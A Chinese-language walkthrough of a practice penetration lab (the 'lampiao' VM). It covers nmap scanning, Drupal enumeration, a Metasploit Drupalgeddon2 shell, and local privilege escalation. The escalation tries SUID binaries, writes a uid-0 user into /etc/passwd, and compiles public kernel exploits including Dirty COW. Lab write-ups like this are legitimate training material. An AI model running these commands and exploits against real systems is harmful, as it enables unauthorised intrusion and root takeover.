实战打靶集锦-016-lampiao

提示:本文记录了博主打靶过程中一次曲折的提权经历

文章

  • 1. 主机发现
  • 2. 端口扫描
  • 3. 服务枚举
  • 4. 服务探查
    • 4.1 80端口探查
    • 4.2 1898端口探查
    • 4.3 EXP搜索
      • 4.3.1 exploit/unix/webapp/drupal_coder_exec
      • 4.3.2 exploit/unix/webapp/drupal_drupalgeddon2
  • 5. 提权
    • 5.1 系统信息枚举
    • 5.2 探查/etc/passwd
    • 5.3 枚举定时任务
    • 5.4 枚举可执行程序
      • 5.4.1 ping6
      • 5.4.2 chfn
    • 5.4.3 pkexec
      • 5.4.4 mtr
      • 5.4.5 pppd
    • 5.5 EXP提权
    • 5.5.1 CVE-2017-16995
    • 5.5.2 CVE-2017-1000112
    • 5.5.3 CVE-2016-8655
      • 5.5.4 CVE-2016-5195 dirtycow
      • 5.5.5 CVE-2016-5195 dirtycow2
  • 6. 获取flag


1. 主机发现

目前只知道目标靶机在65.xx网段,通过如下的命令,看看这个网段上在线的主机。

$ nmap -sP 192.168.65.0/24

实战打靶集锦-016-lampiao_第1张图片
锁定靶机地址为192.168.65.148。

2. 端口扫描

通过下面的命令对目标靶机进行全端口扫描。

$ sudo nmap -p- 192.168.65.148

实战打靶集锦-016-lampiao_第2张图片

3. 服务枚举

通过下面的命令枚举一下目标靶机的开放端口上运行着什么服务。

$ sudo nmap -p22,80,1898 -A -sV -sT 192.168.65.148

实战打靶集锦-016-lampiao_第3张图片
额,80端口上的服务没有没举出来,估计得等会儿手工探查了。

4. 服务探查

4.1 80端口探查

直接用浏览器访问一下看看。
实战打靶集锦-016-lampiao_第4张图片
额,靶机挺会玩儿的,目录枚举一下看看。

$ dirsearch -u http://192.168.65.148

实战打靶集锦-016-lampiao_第5张图片
结果有点令人失望,啥都没扫出来。

4.2 1898端口探查

既然1898端口上也是http的服务,通过浏览器访问一下看看。
实战打靶集锦-016-lampiao_第6张图片
页面中有登录入口、创建账号和密码的入口,看来这里面可能有我们需要的内容,先看一下有没有站点地图。
实战打靶集锦-016-lampiao_第7张图片
内容还挺多的,再进行一下目录枚举。

$ dirsearch -u http://192.168.65.148:1898

实战打靶集锦-016-lampiao_第8张图片
都枚举出来了,我们逐个看看。
从“/MAINTAINERS.txt”页面,我们可以知道这里用的是一个名叫Drupal 7的框架。
实战打靶集锦-016-lampiao_第9张图片
上网搜索一下看看,这个drupal是个啥。
实战打靶集锦-016-lampiao_第10张图片
上图是百度百科的内容,貌似是一个开源的优秀的内容管理框架,继续往下看。从“INSTALL.txt”页面可以看到,Drupal框架会用到Apache 2.0或者以上、PHP 5.2.4或者以上,以及数据库(Mysql 5.0.15及以上、MariaDB 5.1.44及以上,Percona 5.1.70及以上、pgSQL 8.3及以上,SQLite 3.3.7及以上),如下图。
实战打靶集锦-016-lampiao_第11张图片
继续探查,从“CHANGELOG.txt”页面,可以推断当前的Drupal版本应该是7.54。
实战打靶集锦-016-lampiao_第12张图片
继续往下看,scripts目录下,有好多的shell脚本,说不定后面我们可以用得到,尤其是一个对密码进行hash的脚本。
实战打靶集锦-016-lampiao_第13张图片
目前就搜罗到了这么多信息,接下来我们尝试一下登录入口和创建账号密码的入口。
随便输入用户名密码进行登录,看看报什么错。
实战打靶集锦-016-lampiao_第14张图片
用户枚举猜测是不太好办,看看下面的创建账号。
实战打靶集锦-016-lampiao_第15张图片
点击上图中的Create new account按钮之后,会弹出下图所示的提示。
实战打靶集锦-016-lampiao_第16张图片
不管了,发送邮件不成功是正常的,看看下面的request new password能不能有用。
实战打靶集锦-016-lampiao_第17张图片
嗯,这个也是不管用的。

4.3 EXP搜索

搜索一下看看有没有关于Drupal的公共EXP。
实战打靶集锦-016-lampiao_第18张图片
内容还真是不少,并且还有很多都是关于Metasploit的,鉴于Metasploit的神奇之处,我们先用Metasploit搜索一下看看。

msf6 > search drupal

实战打靶集锦-016-lampiao_第19张图片
也不是很多,逐个试试吧。

4.3.1 exploit/unix/webapp/drupal_coder_exec

msf6 > use exploit/unix/webapp/drupal_coder_exec
msf6 exploit(unix/webapp/drupal_coder_exec) > set RHOSTS 192.168.65.148
msf6 exploit(unix/webapp/drupal_coder_exec) > set RPORT 1898
msf6 exploit(unix/webapp/drupal_coder_exec) > run

在这里插入图片描述
运行失败了。

4.3.2 exploit/unix/webapp/drupal_drupalgeddon2

msf6> use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.65.148
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

在这里插入图片描述
感觉这个是靠谱的,进一步验证一下。
实战打靶集锦-016-lampiao_第20张图片
嗯,我们已经成功突破边界。

5. 提权

先优化一下shell(形成习惯了,不管行不行,先执行一下优化再说)。

$ whereis python
$ /usr/bin/python3.4 -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

5.1 系统信息枚举

$ uname -a
$ cat /etc/*-release
$ getconf LONG_BIT

实战打靶集锦-016-lampiao_第21张图片
目标靶机是32位的Ubuntu 14.04.5,kernel版本是4.4.0-32-generic。

5.2 探查/etc/passwd

$ cat /etc/passwd | grep -v "nologin"

实战打靶集锦-016-lampiao_第22张图片
除了root之外,真正具备shell权限的还有个tiago用户。尝试一下弱密码提权。
实战打靶集锦-016-lampiao_第23张图片
尝试往/etc/passwd中写入用户看看。

$ echo "testuser:$1$IbaVSVwa$v6h3hVYDvjI.y0q2Kq0fg.:0:0:root:/root:/bin/bash" >> /etc/passwd

在这里插入图片描述
没权限。

5.3 枚举定时任务

$ cat /etc/crontab

实战打靶集锦-016-lampiao_第24张图片

5.4 枚举可执行程序

先枚举一下root用户下面其它用户客户可写的文件。

$ find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"

在这里插入图片描述
就搜出来了一个隐藏文件.lock,看看这是个啥文件。
在这里插入图片描述
竟然是空的,没有理想的结果,再看看具备SUID的可执行文件(下面命令三选一)。

$ find / -user root -perm -4000 -print 2>/dev/null
$ find / -perm -u=s -type f 2>/dev/null
$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

实战打靶集锦-016-lampiao_第25张图片
上图中的几个程序都值得怀疑,试试看吧。

5.4.1 ping6

从搜索结果来看,ping6不太可能提权。
在这里插入图片描述

5.4.2 chfn

在这里插入图片描述
这个倒是有一定的可能性,我们看一下代码。
实战打靶集锦-016-lampiao_第26张图片
貌似只在SuSE上可行,不管了,既然都到这里了,上传到目标靶机上执行一下看看。
在这里插入图片描述
嗯,这个靶机做了特殊限制,没法直接通过wget下载,我们通过nc传输一下。
靶机上启动6666端口监听,将收到的内容放到1299.sh文件。

www-data@lampiao:/tmp$ nc -nlvp 6666 > 1299.sh

kali上通过kali往靶机的6666端口发送1299.sh文件

$ nc -nv 192.168.65.148 6666 < 1299.sh

然后在靶机上修改一下执行权限,并运行一下。
实战打靶集锦-016-lampiao_第27张图片
理论上,这个脚本应该是可以提权的,可惜的是在这里没法使用,因为需要当前用户的密码,等我们拿到当前用户密码的时候,再回来试试看。

5.4.3 pkexec

这个pkexec是我们的老朋友了,先看一下靶机上的polkit版本。

www-data@lampiao:/tmp$ dpkg -l policykit-1

实战打靶集锦-016-lampiao_第28张图片
在通过searchsploit搜索一下看看。
实战打靶集锦-016-lampiao_第29张图片

后面两个EXP是有可能的,一个得通过Metasploit,另一个是一个静态条件的提权,我们先进入msfconsle搜索一下看看。
实战打靶集锦-016-lampiao_第30张图片
就这三个,都试一下吧。

msf6 > use exploit/linux/local/pkexec
msf6 exploit(linux/local/pkexec) > set LPORT 8888
msf6 exploit(linux/local/pkexec) > run

在这里插入图片描述
是要配置SESSION的,但是Metasploit里面也没有说清楚应该怎么配置,其它两个也都需要配置SESSION,暂时放弃。通过下面的命令将我们前面searchsploit结果中的47543.rb放到指定的metasploit目录下。

$ sudo cp 47543.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp

重新进入一下msfconsole。

msf6 > use exploit/unix/webapp47543
msf6 exploit(unix/webapp/47543) > show options

实战打靶集锦-016-lampiao_第31张图片
同样需要设置SESSION啊,放弃。

5.4.4 mtr

实战打靶集锦-016-lampiao_第32张图片
没有我们感兴趣的。

5.4.5 pppd

在这里插入图片描述
这个也不合适。

5.5 EXP提权

搜索一下Ubuntu和Kernel的对应EXP。
实战打靶集锦-016-lampiao_第33张图片
实战打靶集锦-016-lampiao_第34张图片
还是有不少的,为了保证准确度,我们不急于利用,先用linpeas看一下。
在这里插入图片描述
linpeas也找到了这个CVE-2022-2588的漏洞,前面刚刚用过,这里直接试一下。
在这里插入图片描述嗯,这个是不能直接运行的,直接尝试在本地编译一下。

www-data@lampiao:/tmp/CVE-2022-2588$ gcc -o my_exp exp_file_credential.c

在这里插入图片描述
仍然失败,还是再看看其它的linpeas输出吧。
实战打靶集锦-016-lampiao_第35张图片
有五个高度可行的CVE漏洞,我们逐个试一下。

5.5.1 CVE-2017-16995

直接将45010.c上传到靶机进行编译执行。
在这里插入图片描述
在靶机上无论如何编译这个文件bpf.h都饱含不进去,放弃。

5.5.2 CVE-2017-1000112

直接吧https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c下载下来,上传到靶机进行编译。
实战打靶集锦-016-lampiao_第36张图片
会报大量的错误,放弃。

5.5.3 CVE-2016-8655

直接把40871.c上传到目标靶机,然后编译。

$ gcc -m32 40871.c -o 40871 -lpthread

实战打靶集锦-016-lampiao_第37张图片
产生了非常多的上述的warning,但是编译出可执行文件了,执行一下试试看。
实战打靶集锦-016-lampiao_第38张图片
执行了好久也没有成功,都是些类似上述的输出,暂时放弃。

5.5.4 CVE-2016-5195 dirtycow

实战打靶集锦-016-lampiao_第39张图片
这个感觉还要sudo -s,输入当前用户的密码,有些搞不定,暂时放弃。

5.5.5 CVE-2016-5195 dirtycow2

直接吧40839.c上传到靶机,进行编译。

$ gcc -pthread 40839.c -o 40839 -lcrypt

在这里插入图片描述
破天荒的没报错,直接运行一下看看。
实战打靶集锦-016-lampiao_第40张图片
按照exp代码指示,进行下一步,输入su firefart试试。
实战打靶集锦-016-lampiao_第41张图片
感觉像是挂了啊,再次尝试进去。
在这里插入图片描述
估计是机器挂了,ping一下试试看。
在这里插入图片描述
果真挂了,重启一下靶机,再次提权。
在这里插入图片描述
又挂了,必然挂掉,靶机上的最后输出如下图所示。
实战打靶集锦-016-lampiao_第42张图片
对于这个dirtycow2,还有个编号是40847的EXP,我们也用一下试试看,先通过nc吧40847.cpp上传到目标靶机的/tmp目录下。然后通过gcc进行编译。

www-data@lampiao:/tmp$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

在这里插入图片描述
编译成功。
说明:这里了说明一下各个参数的含义。
-Wall选项让gcc提供所有有用的告警;
-pedantic选项允许发出标准C列出的所有告警;
-O2选项是编译器优化选项的4个级别中的一个(-O0表示无优化,-O1为缺省值,-O3优化级别最高);
-std=c++11选项表示按照2011版C++的标准执行编译;
-pthread选项表示当用到多线程时调用pthread库。

然后运行一下编译的可执行文件。
实战打靶集锦-016-lampiao_第43张图片
直接搞出了root的密码,太牛逼了,试一下切换到root用户。
在这里插入图片描述
貌似搞定了,验证一下。
实战打靶集锦-016-lampiao_第44张图片

6. 获取flag

实战打靶集锦-016-lampiao_第45张图片
搞定。

你可能感兴趣的:(实战打靶集锦,渗透测试,渗透,lampiao,Drupal渗透,dirtycow提权,脏牛提权)